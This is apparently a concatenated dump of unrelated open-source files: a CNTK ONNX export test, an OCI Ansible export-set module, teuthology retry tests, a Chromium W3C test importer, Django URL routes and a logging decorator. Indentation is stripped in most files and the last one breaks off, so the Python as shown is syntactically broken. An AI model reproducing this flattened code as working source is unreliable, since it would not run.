onnx_model_description = onnx_model.graph.doc_string
uid_name_map = dict(tuple(x[3:-3].split(', ')) for x in re.findall(r'<<<[^>]*>>>', onnx_model_description)[1:])
# input names are mapped from uid to names (requested by skype team)
input_names = [x.uid if not x.name else x.name for x in func.arguments]
# handle block outputs
output_names = []
block_uid_count = {}
    # When a block is exported as a single onnx node, the onnx node output takes its name from the block node output.
    # When a block is exported by exporting the nodes within that block, the onnx node output takes its name from the inner node output.
# the cntk node that provides the name will have its uid stored in the uid_name_map.
# this function tries to find the deepest inner output node whose uid is in uid_name_map.
def find_deepest_inner_block_output(output):
# might be a placeholder
if not output.is_output:
return False, output
if output.owner and output.owner.is_block:
block_uid_count[output.owner.uid] = block_uid_count[output.owner.uid] + 1 if output.owner.uid in block_uid_count else 0
found, inner_output = find_deepest_inner_block_output(output.owner.block_root.outputs[block_uid_count[output.owner.uid]])
if found:
return True, inner_output
return output.uid in uid_name_map, output
for output in func.outputs:
_, output = find_deepest_inner_block_output(output)
output_names.append(uid_name_map[output.uid])
test_data_dir = os.path.join(dir, data_dir)
if not os.path.exists(test_data_dir):
os.makedirs(test_data_dir)
SaveData(test_data_dir, 'input', onnx_model.graph.input, func.arguments, inputs, input_names, batch_size)
SaveData(test_data_dir, 'output', onnx_model.graph.output, func.outputs, outputs, output_names, batch_size)
# Initialize tmp-directory for exporting cntk models
tmpdir = 'tmp_exported_models'
if os.path.isdir(tmpdir):
    # os.mkdir might get called before shutil.rmtree completes, so rename the current tmpdir to avoid a collision.
tmp = tempfile.mktemp(dir=os.path.dirname(tmpdir))
shutil.move(tmpdir, tmp)
shutil.rmtree(tmp)
os.mkdir(tmpdir)
# test_cntk_model will create exported onnx model with test data in the following tmp folder:
# .
# +-- tmp_exported_models # models exported in 'model.onnx' onnx format.
# | +-- test_model1
# | | +-- model.onnx
# | | +-- test_data_set_0
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | | +-- test_data_set_1
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | +-- test_model2
# ...
@pytest.mark.parametrize("use_external_files_to_store_parameters", (False, True))
@pytest.mark.parametrize('model_name',
[model_name for model_name in cntk_model_names],
ids=[model_name for model_name in cntk_model_names])
def test_cntk_model(model_name, use_external_files_to_store_parameters):
if model_name in skip_cntk_model_names:
pytest.skip('Skip cntk model test. ')
cntk_base_dir = get_base_dir('PretrainedModelsV2')
model_dir = os.path.join(cntk_base_dir, model_name)
model = C.Function.load(model_dir, format=C.ModelFormat.CNTKv2)
resave_model_dir = os.path.join(tmpdir, 'test_' + model_name)
if use_external_files_to_store_parameters:
resave_model_dir += "_ext"
resave_model_path = os.path.join(resave_model_dir, model_file)
np.random.seed(3)
input_shape = (1,) + model.arguments[0].shape
data_x = np.asarray(np.random.uniform(-1, 1, input_shape), dtype=np.float32)
data_y = model.eval({model.arguments[0]:data_x})
Save(resave_model_dir, model, data_x, data_y,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
    # CNTK evaluation fails for the imported ResNet110 model because of its depth.
if model_name != "ResNet110_CIFAR10_CNTK.model":
reloaded_model = C.Function.load(resave_model_path, format=C.ModelFormat.ONNX)
data_y_ = reloaded_model.eval({reloaded_model.arguments[0]:data_x})
np.testing.assert_equal(len(data_y), len(data_y_))
for i in range(len(data_y)):
np.testing.assert_equal(data_y[i].dtype, data_y_[i].dtype)
np.testing.assert_allclose(
data_y[i],
data_y_[i],
rtol=1e-3,
atol=1e-4)
verify_results_with_onnxruntime(model_name, str(os.path.abspath(tmpdir)))
rnn_base_dir = get_base_dir('rnn_models')
rnn_model_names = [dir for dir in os.listdir(rnn_base_dir)
if os.path.isfile(os.path.join(rnn_base_dir, dir)) and dir.rfind('.model') + len('.model') == len(dir)] if os.path.exists(rnn_base_dir) else []
skip_rnn_model_names = [
# ORT has a different random generator than CNTK. It will not create the same outputs.
'SmartReply.cvae_gather.model',
    # The SmartReply.SelfAtt.infer_model.cnt.model test requires a GPU; however, it failed with both the GPU and CPU runs.
    # Skip it for now to unblock the nightly build.
'SmartReply.SelfAtt.infer_model.cnt.model'
]
verify_with_resave = [
'SmartReply.3outputs.Trained.gather.model',
'SmartReply.3outputs.Untrained.model'
]
models_with_sequential_data = [
'Speech.princeton.gather.flattened.model',
'Speech.model.lstm.900.converted.LSTMoutputW.model',
'Speech.cris.ff.model.dbn.HLast.model',
'Speech.262.cntk.model'
]
seq_models_with_sparse_data = [
'Bing.Malta50.proto1_128_gru_normv3_ep3_z.model',
'SmartReply.3outputs.Trained.gather.model',
'SmartReply.3outputs.Untrained.model',
]
non_seq_models_with_sparse_data = [
'Speech.Polyphony.DNN.FinalModel.cmf.model'
]
def verify_model(cntk_model, node_name, tmpdir, model_name, image = None, skip_round_trip_test = True,
use_external_files_to_store_parameters = False):
if (node_name is not None):
cntk_node = cntk_model.find_by_name(node_name)
if not cntk_node:
cntk_node = C.logging.depth_first_search(cntk_model, lambda x: x.uid == node_name, depth = 10)[0]
cntk_node_model = C.as_composite(cntk_node)
else:
node_name = "full"
cntk_node_model = cntk_model
sanitized_node_name = model_name + node_name.replace("/", ".")
if (image is None):
image = np.random.rand(*np.shape(cntk_model.arguments[0])).astype(np.float32)
test_model_path = os.path.join(str(tmpdir), R'test_' + sanitized_node_name)
print(test_model_path)
if os.path.exists(test_model_path):
shutil.rmtree(test_model_path, ignore_errors=True)
verify_sequence_model(cntk_node_model, image, tmpdir, sanitized_node_name, resave = not skip_round_trip_test,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
@pytest.mark.parametrize("use_external_files_to_store_parameters", (False, True))
@pytest.mark.parametrize('model_name',
[model_name for model_name in rnn_model_names],
ids=[model_name for model_name in rnn_model_names])
def test_cntk_rnn_models(model_name, use_external_files_to_store_parameters):
if model_name in skip_rnn_model_names:
pytest.skip('Skip cntk rnn model test. ')
rnn_base_dir = get_base_dir('rnn_models')
model_dir = os.path.join(rnn_base_dir, model_name)
model = C.Function.load(model_dir, format=C.ModelFormat.CNTKv2)
# Generate model-specific data
data = []
np.random.seed(0)
sequence_length = 10
if model_name == 'SmartReply.Base_BiLSTM_gather_indice_input.model':
feature_size = 99466
data.append(generate_sequence_data(1, sequence_length, feature_size, input_as_index = True))
elif model_name == 'SmartReply.SelfAtt.infer_model.cnt.model':
data = []
batch_size, seq_len = 1, 17
for arg in model.arguments[:-1]:
# data = [*data, generate_sparse_data_no_batch(seq_len, arg.shape[0])]
data.append(generate_sparse_data(batch_size, seq_len, arg.shape[0]))
# the last argument is a sequence of booleans of length 8
data.append(np.array([[[1],[0],[1],[0],[1],[1],[0],[1]]]).astype(np.float32))
elif model_name == 'Speech.lstm_pit.cntk48.ElementTimes3117.model':
batch_size, seq_len, feature_size, feature_size2, feature_size3 = 1, 17, 257, 1542, 257
data1 = np.random.rand(batch_size, seq_len, feature_size).astype(np.float32)
data2 = np.random.rand(batch_size, seq_len, feature_size2).astype(np.float32)
data3 = np.random.rand(batch_size, seq_len, feature_size3).astype(np.float32)
data = [data1, data2, data3]
elif model_name == 'LocalIntent.reduced.model':
batch_size, seq_len = 1, 3
f1, f2, f3, f4, f5 = 300, 1119, 9, 10, 12
data1 = np.random.rand(batch_size, seq_len, f1).astype(np.float32)
data2 = generate_sparse_data(batch_size, seq_len, f2)
data3 = np.random.rand(batch_size, seq_len, f3).astype(np.float32)
data4 = np.random.rand(batch_size, seq_len, f4).astype(np.float32)
data5 = np.random.rand(batch_size, seq_len, f5).astype(np.float32)
data = [data1, data2, data3, data4, data5]
else:
for arg in model.arguments:
if model_name in models_with_sequential_data:
data.append(generate_sequential_data((1,sequence_length) + arg.shape))
elif model_name in seq_models_with_sparse_data:
data.append(generate_sparse_data(1, sequence_length, arg.shape[0]))
elif model_name in non_seq_models_with_sparse_data:
data.append(generate_sparse_data_non_seq(1, arg.shape[0]))
else:
data.append(generate_sequence_data(1, sequence_length, arg.shape[0]))
# Validate model results
    test_name = model_name + "_ext_" if use_external_files_to_store_parameters else model_name
    if model_name in verify_with_resave:
verify_model(model, None, tmpdir, test_name, data[0] if len(data) == 1 else data , True,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
else:
save_onnx_model_with_validation_data(tmpdir, model, data[0] if len(data) == 1 else data, test_name, device=None,
use_external_files_to_store_parameters = use_external_files_to_store_parameters)
verify_results_with_onnxruntime(test_name, str(os.path.abspath(tmpdir)))
|
library/oci_export_set.py | slmjy/oci-ansible-modules | 106 | 11089549 |
#!/usr/bin/python
# Copyright (c) 2018, Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_export_set
short_description: Update an Export Set in OCI Filesystem Service.
description:
- Update an OCI Export Set, if present, with a new display name
- Update an OCI Export Set, if present, with new max_fs_stat_bytes
- Update an OCI Export Set, if present, with new max_fs_stat_files
version_added: "2.5"
options:
export_set_id:
        description: Identifier of the existing Export Set which is required to be updated.
required: false
aliases: ['id']
display_name:
description: A user-friendly name. It does not have to be unique, and it is changeable. Avoid entering confidential
information.
required: false
max_fs_stat_bytes:
description: Controls the maximum tbytes, fbytes, and abytes values reported by NFS FSSTAT calls through any associated
mount targets. This is an advanced feature. For most applications, use the default value. The tbytes value
reported by FSSTAT will be max_fs_stat_bytes. The value of fbytes and abytes will be max_fs_stat_bytes minus the
metered size of the file system. If the metered size is larger than max_fs_stat_bytes, then fbytes and abytes
will both be '0'.
required: false
max_fs_stat_files:
        description: Controls the maximum tfiles, ffiles, and afiles values reported by NFS FSSTAT calls through any associated
mount targets. This is an advanced feature. For most applications, use the default value. The tfiles value
reported by FSSTAT will be max_fs_stat_files. The value of ffiles and afiles will be max_fs_stat_files minus the
metered size of the file system. If the metered size is larger than max_fs_stat_files, then ffiles and afiles
will both be '0'.
required: false
state:
description: Update Export Set. For I(state=present), it gets updated.
required: false
default: 'present'
choices: ['present']
author:
- "<NAME>(@debayan_gupta)"
extends_documentation_fragment: [ oracle, oracle_wait_options ]
"""
EXAMPLES = """
# Note: These examples do not set authentication details.
# Update Export Set's display name
- name: Update Export Set's display name
oci_export_set:
export_set_id: 'ocid1.exportset.oc1..xxxxxEXAMPLExxxxx'
display_name: 'updated_ansible_export_set'
state: 'present'
# Update Export Set's max_fs_stat_bytes
- name: Update Export Set's max_fs_stat_bytes
oci_export_set:
export_set_id: 'ocid1.exportset.oc1..xxxxxEXAMPLExxxxx'
max_fs_stat_bytes: 9223372036854775806
state: 'present'
# Update Export Set's max_fs_stat_files
- name: Update Export Set's max_fs_stat_files
oci_export_set:
export_set_id: 'ocid1.exportset.oc1..xxxxxEXAMPLExxxxx'
max_fs_stat_files: 9223372036854775806
state: 'present'
"""
RETURN = """
export_set:
description: Attributes of the updated Export Set.
returned: success
type: complex
contains:
compartment_id:
description: The identifier of the compartment containing the Export Set
returned: always
type: string
sample: ocid1.compartment.oc1.xzvf..xxxxxEXAMPLExxxxx
availability_domain:
description: The availability domain the Export Set is in.
returned: always
type: string
sample: IwGV:US-EXAMPLE-AD-1
display_name:
description: The user-friendly name for the Export Set.
returned: always
type: string
sample: ansible-file-system
id:
description: The identifier of the Export Set
returned: always
type: string
sample: ocid1.exportset.oc1.xzvf..xxxxxEXAMPLExxxxx
lifecycle_state:
description: The current state of the Export Set.
returned: always
type: string
sample: ACTIVE
max_fs_stat_bytes:
description: Controls the maximum tbytes, fbytes, and abytes values reported by NFS FSSTAT calls
through any associated mount targets. This is an advanced feature. For most applications,
use the default value. The tbytes value reported by FSSTAT will be max_fs_stat_bytes. The
value of fbytes and abytes will be max_fs_stat_bytes minus the metered size of the file
system. If the metered size is larger than max_fs_stat_bytes, then fbytes and abytes
will both be '0'.
returned: always
type: int
sample: 9223372036854775807
max_fs_stat_files:
description: Controls the maximum tfiles, ffiles, and afiles values reported by NFS FSSTAT calls
through any associated mount targets. This is an advanced feature. For most applications,
use the default value. The tfiles value reported by FSSTAT will be max_fs_stat_files. The
value of ffiles and afiles will be max_fs_stat_files minus the metered size of the file
system. If the metered size is larger than max_fs_stat_files, then ffiles and afiles
will both be '0'.
returned: always
type: int
sample: 9223372036854775807
time_created:
description: Date and time when the Export Set was created, in
the format defined by RFC3339
returned: always
type: datetime
sample: 2018-10-19T18:17:03.907000+00:00
vcn_id:
description: The identifier of the virtual cloud network (VCN) the export set is in.
returned: always
type: string
sample: ocid1.vcn.oc1.xzvf..xxxxxEXAMPLExxxxx
sample: {
"availability_domain":"IwGV:US-EXAMPLE-AD-1",
"compartment_id":"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx",
"display_name":"ansible_export_set",
"id":"ocid1.exportset.oc1.iad.xxxxxEXAMPLExxxxx",
"lifecycle_state":"ACTIVE",
"max_fs_stat_bytes":9223372036854775807,
"max_fs_stat_files":9223372036854775807,
"time_created":"2018-10-19T18:17:03.907000+00:00",
"vcn_id":"ocid1.vcn.oc1.iad.xxxxxEXAMPLExxxxx"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.oracle import oci_utils
try:
from oci.file_storage.file_storage_client import FileStorageClient
from oci.exceptions import ServiceError, ClientError
from oci.file_storage.models import UpdateExportSetDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
def update_export_set(file_storage_client, module):
result = dict(changed=False, export_set="")
try:
result = oci_utils.check_and_update_resource(
resource_type="export_set",
get_fn=file_storage_client.get_export_set,
kwargs_get={"export_set_id": module.params["export_set_id"]},
update_fn=file_storage_client.update_export_set,
client=file_storage_client,
primitive_params_update=["export_set_id"],
kwargs_non_primitive_update={
UpdateExportSetDetails: "update_export_set_details"
},
module=module,
update_attributes=UpdateExportSetDetails().attribute_map,
)
except ServiceError as ex:
get_logger().error("Unable to update Export Set due to: %s", ex.message)
module.fail_json(msg=ex.message)
except ClientError as ex:
get_logger().error("Unable to update Export Set due to: %s", str(ex))
module.fail_json(msg=str(ex))
return result
def set_logger(input_logger):
global logger
logger = input_logger
def get_logger():
return logger
def main():
logger = oci_utils.get_logger("oci_export_set")
set_logger(logger)
module_args = oci_utils.get_common_arg_spec(supports_wait=True)
module_args.update(
dict(
max_fs_stat_bytes=dict(type=int, required=False),
max_fs_stat_files=dict(type=int, required=False),
export_set_id=dict(type="str", required=False, aliases=["id"]),
display_name=dict(type="str", required=False),
state=dict(
type="str", required=False, default="present", choices=["present"]
),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module")
file_storage_client = oci_utils.create_service_client(module, FileStorageClient)
state = module.params["state"]
if state == "present":
result = update_export_set(file_storage_client, module)
module.exit_json(**result)
if __name__ == "__main__":
main()
|
teuthology/test/test_contextutil.py | varshar16/teuthology | 117 | 11089561 | from pytest import raises
from teuthology import contextutil
from logging import ERROR
class TestSafeWhile(object):
def setup(self):
contextutil.log.setLevel(ERROR)
self.fake_sleep = lambda s: True
self.s_while = contextutil.safe_while
def test_6_5_10_deal(self):
with raises(contextutil.MaxWhileTries):
with self.s_while(_sleeper=self.fake_sleep) as proceed:
while proceed():
pass
def test_6_0_1_deal(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
tries=1,
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert 'waiting for 6 seconds' in str(error)
def test_1_0_10_deal(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
sleep=1,
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert 'waiting for 10 seconds' in str(error)
def test_6_1_10_deal(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
increment=1,
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert 'waiting for 105 seconds' in str(error)
def test_action(self):
with raises(contextutil.MaxWhileTries) as error:
with self.s_while(
action='doing the thing',
_sleeper=self.fake_sleep
) as proceed:
while proceed():
pass
assert "'doing the thing' reached maximum tries" in str(error)
def test_no_raise(self):
with self.s_while(_raise=False, _sleeper=self.fake_sleep) as proceed:
while proceed():
pass
assert True
|
third_party/WebKit/Tools/Scripts/webkitpy/w3c/test_importer.py | google-ar/chromium | 777 | 11089572 |
# Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
"""Logic for converting and copying files from a W3C repo.
This module is responsible for modifying and copying a subset of the tests from
a local W3C repository source directory into a destination directory.
"""
import logging
import mimetypes
import os
import re
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.layout_tests.models.test_expectations import TestExpectationParser
from webkitpy.w3c.test_parser import TestParser
from webkitpy.w3c.test_converter import convert_for_webkit
# Maximum length of import path starting from top of source repository.
# This limit is here because the Windows builders cannot create paths that are
# longer than the Windows max path length (260). See http://crbug.com/609871.
MAX_PATH_LENGTH = 125
_log = logging.getLogger(__name__)
class TestImporter(object):
def __init__(self, host, source_repo_path, dest_dir_name='external'):
"""Initializes variables to prepare for copying and converting files.
Args:
            source_repo_path: Path to the local checkout of a WPT repository.
"""
self.host = host
assert self.host.filesystem.exists(source_repo_path)
self.source_repo_path = source_repo_path
self.dest_dir_name = dest_dir_name
self.filesystem = self.host.filesystem
self.webkit_finder = WebKitFinder(self.filesystem)
self._webkit_root = self.webkit_finder.webkit_base()
self.layout_tests_dir = self.webkit_finder.path_from_webkit_base('LayoutTests')
self.destination_directory = self.filesystem.normpath(
self.filesystem.join(
self.layout_tests_dir,
dest_dir_name,
self.filesystem.basename(self.source_repo_path)))
self.import_in_place = (self.source_repo_path == self.destination_directory)
self.dir_above_repo = self.filesystem.dirname(self.source_repo_path)
self.import_list = []
# This is just a FYI list of CSS properties that still need to be prefixed,
# which may be output after importing.
self._prefixed_properties = {}
def do_import(self):
_log.info("Importing %s into %s", self.source_repo_path, self.destination_directory)
self.find_importable_tests()
self.import_tests()
def find_importable_tests(self):
"""Walks through the source directory to find what tests should be imported.
This function sets self.import_list, which contains information about how many
tests are being imported, and their source and destination paths.
"""
paths_to_skip = self.find_paths_to_skip()
for root, dirs, files in self.filesystem.walk(self.source_repo_path):
cur_dir = root.replace(self.dir_above_repo + '/', '') + '/'
_log.info(' scanning ' + cur_dir + '...')
total_tests = 0
reftests = 0
jstests = 0
# Files in 'tools' are not for browser testing, so we skip them.
# See: http://testthewebforward.org/docs/test-format-guidelines.html#tools
dirs_to_skip = ('.git', 'test-plan', 'tools')
# We copy all files in 'support', including HTML without metadata.
# See: http://testthewebforward.org/docs/test-format-guidelines.html#support-files
dirs_to_include = ('resources', 'support')
if dirs:
for name in dirs_to_skip:
if name in dirs:
dirs.remove(name)
for path in paths_to_skip:
path_base = path.replace(self.dest_dir_name + '/', '')
path_base = path_base.replace(cur_dir, '')
path_full = self.filesystem.join(root, path_base)
if path_base in dirs:
dirs.remove(path_base)
if self.import_in_place:
_log.info(" pruning %s", path_base)
self.filesystem.rmtree(path_full)
else:
_log.info(" skipping %s", path_base)
copy_list = []
for filename in files:
path_full = self.filesystem.join(root, filename)
path_base = path_full.replace(self.source_repo_path + '/', '')
path_base = self.destination_directory.replace(self.layout_tests_dir + '/', '') + '/' + path_base
if path_base in paths_to_skip:
if self.import_in_place:
_log.info(" pruning %s", path_base)
self.filesystem.remove(path_full)
continue
else:
continue
# FIXME: This block should really be a separate function, but the early-continues make that difficult.
if filename.startswith('.') or filename.endswith('.pl'):
                    # The W3C repos may contain Perl scripts, which we don't care about.
continue
if filename == 'OWNERS' or filename == 'reftest.list':
# These files fail our presubmits.
# See http://crbug.com/584660 and http://crbug.com/582838.
continue
fullpath = self.filesystem.join(root, filename)
mimetype = mimetypes.guess_type(fullpath)
if ('html' not in str(mimetype[0]) and
'application/xhtml+xml' not in str(mimetype[0]) and
'application/xml' not in str(mimetype[0])):
copy_list.append({'src': fullpath, 'dest': filename})
continue
if self.filesystem.basename(root) in dirs_to_include:
copy_list.append({'src': fullpath, 'dest': filename})
continue
test_parser = TestParser(fullpath, self.host)
test_info = test_parser.analyze_test()
if test_info is None:
copy_list.append({'src': fullpath, 'dest': filename})
continue
if self.path_too_long(path_full):
_log.warning('%s skipped due to long path. '
'Max length from repo base %d chars; see http://crbug.com/609871.',
path_full, MAX_PATH_LENGTH)
continue
if 'reference' in test_info.keys():
test_basename = self.filesystem.basename(test_info['test'])
# Add the ref file, following WebKit style.
# FIXME: Ideally we'd support reading the metadata
# directly rather than relying on a naming convention.
# Using a naming convention creates duplicate copies of the
# reference files (http://crrev.com/268729).
ref_file = self.filesystem.splitext(test_basename)[0] + '-expected'
# Make sure to use the extension from the *reference*, not
# from the test, because at least flexbox tests use XHTML
# references but HTML tests.
ref_file += self.filesystem.splitext(test_info['reference'])[1]
if not self.filesystem.exists(test_info['reference']):
_log.warning('%s skipped because ref file %s was not found.',
path_full, ref_file)
continue
if self.path_too_long(path_full.replace(filename, ref_file)):
_log.warning('%s skipped because path of ref file %s would be too long. '
'Max length from repo base %d chars; see http://crbug.com/609871.',
path_full, ref_file, MAX_PATH_LENGTH)
continue
reftests += 1
total_tests += 1
copy_list.append({'src': test_info['reference'], 'dest': ref_file,
'reference_support_info': test_info['reference_support_info']})
copy_list.append({'src': test_info['test'], 'dest': filename})
elif 'jstest' in test_info.keys():
jstests += 1
total_tests += 1
copy_list.append({'src': fullpath, 'dest': filename, 'is_jstest': True})
if copy_list:
# Only add this directory to the list if there's something to import
self.import_list.append({'dirname': root, 'copy_list': copy_list,
'reftests': reftests, 'jstests': jstests, 'total_tests': total_tests})
def find_paths_to_skip(self):
paths_to_skip = set()
port = self.host.port_factory.get()
w3c_import_expectations_path = self.webkit_finder.path_from_webkit_base('LayoutTests', 'W3CImportExpectations')
w3c_import_expectations = self.filesystem.read_text_file(w3c_import_expectations_path)
parser = TestExpectationParser(port, all_tests=(), is_lint_mode=False)
expectation_lines = parser.parse(w3c_import_expectations_path, w3c_import_expectations)
for line in expectation_lines:
if 'SKIP' in line.expectations:
if line.specifiers:
_log.warning("W3CImportExpectations:%s should not have any specifiers", line.line_numbers)
continue
paths_to_skip.add(line.name)
return paths_to_skip
def import_tests(self):
"""Reads |self.import_list|, and converts and copies files to their destination."""
total_imported_tests = 0
total_imported_reftests = 0
total_imported_jstests = 0
for dir_to_copy in self.import_list:
total_imported_tests += dir_to_copy['total_tests']
total_imported_reftests += dir_to_copy['reftests']
total_imported_jstests += dir_to_copy['jstests']
if not dir_to_copy['copy_list']:
continue
orig_path = dir_to_copy['dirname']
relative_dir = self.filesystem.relpath(orig_path, self.source_repo_path)
dest_dir = self.filesystem.join(self.destination_directory, relative_dir)
if not self.filesystem.exists(dest_dir):
self.filesystem.maybe_make_directory(dest_dir)
copied_files = []
for file_to_copy in dir_to_copy['copy_list']:
copied_file = self.copy_file(file_to_copy, dest_dir)
if copied_file:
copied_files.append(copied_file)
_log.info('')
_log.info('Import complete')
_log.info('')
_log.info('IMPORTED %d TOTAL TESTS', total_imported_tests)
_log.info('Imported %d reftests', total_imported_reftests)
_log.info('Imported %d JS tests', total_imported_jstests)
_log.info('Imported %d pixel/manual tests', total_imported_tests - total_imported_jstests - total_imported_reftests)
_log.info('')
if self._prefixed_properties:
_log.info('Properties needing prefixes (by count):')
for prefixed_property in sorted(self._prefixed_properties, key=lambda p: self._prefixed_properties[p]):
_log.info(' %s: %s', prefixed_property, self._prefixed_properties[prefixed_property])
def copy_file(self, file_to_copy, dest_dir):
"""Converts and copies a file, if it should be copied.
Args:
file_to_copy: A dict in a file copy list constructed by
find_importable_tests, which represents one file to copy, including
the keys:
"src": Absolute path to the source location of the file.
"destination": File name of the destination file.
And possibly also the keys "reference_support_info" or "is_jstest".
dest_dir: Path to the directory where the file should be copied.
Returns:
The path to the new file, relative to the Blink root (//third_party/WebKit).
"""
source_path = self.filesystem.normpath(file_to_copy['src'])
dest_path = self.filesystem.join(dest_dir, file_to_copy['dest'])
if self.filesystem.isdir(source_path):
_log.error('%s refers to a directory', source_path)
return None
if not self.filesystem.exists(source_path):
_log.error('%s not found. Possible error in the test.', source_path)
return None
reference_support_info = file_to_copy.get('reference_support_info') or None
if not self.filesystem.exists(self.filesystem.dirname(dest_path)):
if not self.import_in_place:
self.filesystem.maybe_make_directory(self.filesystem.dirname(dest_path))
relpath = self.filesystem.relpath(dest_path, self.layout_tests_dir)
# FIXME: Maybe doing a file diff is in order here for existing files?
# In other words, there's no sense in overwriting identical files, but
# there's no harm in copying the identical thing.
_log.info(' %s', relpath)
if self.should_try_to_convert(file_to_copy, source_path, dest_dir):
converted_file = convert_for_webkit(
dest_dir, filename=source_path,
reference_support_info=reference_support_info,
host=self.host)
for prefixed_property in converted_file[0]:
self._prefixed_properties.setdefault(prefixed_property, 0)
self._prefixed_properties[prefixed_property] += 1
self.filesystem.write_text_file(dest_path, converted_file[1])
else:
if not self.import_in_place:
self.filesystem.copyfile(source_path, dest_path)
if self.filesystem.read_binary_file(source_path)[:2] == '#!':
self.filesystem.make_executable(dest_path)
return dest_path.replace(self._webkit_root, '')
@staticmethod
def should_try_to_convert(file_to_copy, source_path, dest_dir):
"""Checks whether we should try to modify the file when importing."""
if file_to_copy.get('is_jstest', False):
return False
# Conversion is not necessary for any tests in wpt now; see http://crbug.com/654081.
# Note, we want to move away from converting files, see http://crbug.com/663773.
if re.search(r'[/\\]external[/\\]wpt[/\\]', dest_dir):
return False
# Only HTML, XHTML and CSS files should be converted.
mimetype, _ = mimetypes.guess_type(source_path)
return mimetype in ('text/html', 'application/xhtml+xml', 'text/css')
def path_too_long(self, source_path):
"""Checks whether a source path is too long to import.
Args:
Absolute path of file to be imported.
Returns:
True if the path is too long to import, False if it's OK.
"""
path_from_repo_base = os.path.relpath(source_path, self.source_repo_path)
return len(path_from_repo_base) > MAX_PATH_LENGTH
|
corehq/apps/aggregate_ucrs/urls.py | dimagilg/commcare-hq | 471 | 11089595 |
from django.conf.urls import url
from . import views
# these are included by the userreports urls
urlpatterns = [
url(r'^view/(?P<table_id>[\w-]+)/$', views.AggregateUCRView.as_view(),
name=views.AggregateUCRView.urlname),
url(r'^preview/(?P<table_id>[\w-]+)/$', views.PreviewAggregateUCRView.as_view(),
name=views.PreviewAggregateUCRView.urlname),
url(r'^export/(?P<table_id>[\w-]+)/$', views.export_aggregate_ucr,
name='export_aggregate_ucr'),
url(r'^rebuild/(?P<table_id>[\w-]+)/$', views.rebuild_aggregate_ucr,
name='rebuild_aggregate_ucr'),
]
|
libs/pipeline_logger/pipeline_logger/__init__.py | silentmonk/KubeFlow | 2,527 | 11089615 |
from logging import Logger
from datetime import datetime
import json
from typing import Callable
__version__ = "1.0.2"
# TODO: Handle batched inputs and outputs (using above custom fn's - match inputs to outputs!)
# TODO: Add Monitors around these calls!!
class log(object):
def __init__(self,
labels: dict,
logger: Logger,
custom_inputs_fn: Callable=None,
custom_outputs_fn: Callable=None):
self._labels = labels
self._logger = logger
self._custom_inputs_fn = custom_inputs_fn
self._custom_outputs_fn = custom_outputs_fn
def __call__(self, function):
def wrapped_function(*args: bytes):
log_dict = {
'log_labels': self._labels,
'log_inputs': str(args),
}
if self._custom_inputs_fn:
                custom_inputs = self._custom_inputs_fn(*args)
log_dict['log_custom_inputs'] = custom_inputs
outputs = function(*args)
log_dict['log_outputs'] = outputs
if self._custom_outputs_fn:
custom_outputs = self._custom_outputs_fn(outputs)
log_dict['log_custom_outputs'] = custom_outputs
self._logger.info(json.dumps(log_dict))
return outputs
return wrapped_function
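# Illustrative usage sketch (not part of the library): wrap a function so that
# each call emits one JSON log line containing the labels, the stringified
# inputs and the outputs. The logger name, labels and function below are
# assumptions made only for the example; the wrapped function's return value
# must be JSON-serializable because it is passed to json.dumps.
import logging as _logging

_example_logger = _logging.getLogger('pipeline_logger_example')


@log(labels={'model_name': 'mnist', 'model_tag': 'v1'}, logger=_example_logger)
def _example_predict(request: bytes) -> str:
    # a stand-in "model" that just describes its input
    return 'received %d bytes' % len(request)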
|
cvnets/layers/activation/leaky_relu.py | apple/ml-cvnets | 209 | 11089622 |
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from torch import nn, Tensor
from typing import Tuple, Optional
from . import register_act_fn
